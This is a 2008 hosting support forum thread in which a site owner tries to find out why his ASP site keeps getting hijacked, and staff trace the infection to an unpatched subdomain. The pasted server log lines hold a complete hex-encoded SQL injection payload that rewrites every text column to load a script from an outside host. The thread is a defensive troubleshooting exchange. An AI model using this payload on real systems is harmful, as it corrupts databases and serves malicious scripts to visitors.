Site hijacked

[zaboss]

Hi,

I have a site which is became a good target for hijack attempts. Last weekend there was a succesful attempt. I have manage to clear the mess and found the holes and covered them OK. To my surprise, I found that the site was hijacked again although it should have been impossible because the page used to hijack doesn't exist - actually it exists, but it has nothing in it, just 2 proposition saying that our site will be back online soon.

Here it is what it looks like the "default.asp" page:

<P>Pentru moment, site-ul nostru este indisponibil. Ne cerem scuze si va rugam sa reveniti. </P>
<P>For the moment, this site is not available. We appologize for the inconvenient. Please come back later. </P>

Here it is what the log file says:

2008-06-23 17:04:27 190.37.135.200 - W3SVC692 JI-WIN25 64.187.109.136 80 GET /default.asp nr=10;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E616C7A686561642E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 200 0 471 1416 0 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - -

How was this possible? If they would have used the patched version of the site, the hijack should have been alllowed (I have tested the patch myself with the same injection). Is it possible that they have a cached version of the site? How can I overid this?

 

[Stephen]

No it is not possible to have cached as we don't use a cache on ASP pages.

Now, is there ANY DB content to this page at all?

 

[zaboss]

Nope, the text above is the only content. Yesterday I have counted 25 attacks from different IPs from India, Brasil, Turkey, China and Vietnam. The site is cadranpolitic.ro.

 

[zaboss]

The site continues to be hijacked, regardless my patches. If i try to inject the SQL in the url as they are doing, it is stopped. How in Earth are they doing it? Also, how can they use an asp page that only has 2 phrases between < p ></ p >?

Ticket ID: NSZ-89610-107

 

[Stephen]

they are not hacking it through default.asp but through view_article.asp
will have logs on ticket

stupid SQL trojans getting on my nerves!:target:

 

[zaboss]

Nope Stephen,

I have restored the database and wait for the attack and found out that the culprit is:

2008-06-25 13:26:31 201.22.176.50 - W3SVC692 JI-WIN25 64.187.109.136 80 GET /default.asp nr=39;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6261736534382E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 200 0 471 1414 16 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - -
There were 2 attempts, only to default.asp, during the monitored interval: 13:00-14:00. I have also check the injection in MS SQL (I have executed it over a test database) and the script matched the one on the site.

Please NOTE that the default.asp is containing only:

<P>Pentru moment, site-ul nostru este indisponibil. Ne cerem scuze si va rugam sa reveniti. </P>
<P>For the moment, this site is not available. We appologize for the inconvenient. Please come back later. </P>

the OLD default.asp page is renamed as ddefault.asp.

So, THEY ARE USING A PAGE THAT HAS ONLY PLAIN TEXT. HOW THEY HIJACK THE SITE? IS IT POSSIBLE TO USE A CACHED VERSION?

Please, be more thorough on this. Also, try to do the injection on any of the actual site page and see it just doesn't work, my patch is catching them.

 

[zaboss]

I have restored the db again and change the default.asp with the patched version. Of course, the site was hijacked again. I have tested the patch and it works on all pages, so IT HAS TO BE ANOTHER issue. WHICH? I really don't know where to look.

 

[Stephen]

look, there is NO CACHE it is not using cache at all, do you share the DB with a subdomain or any other using it?

In fact I can tell you looking at your subdomains, they are getting hit more than your main domain. (check nou)

 

[zaboss]

Thanks, it was the subdomain that wasn't patched and the infection were through it.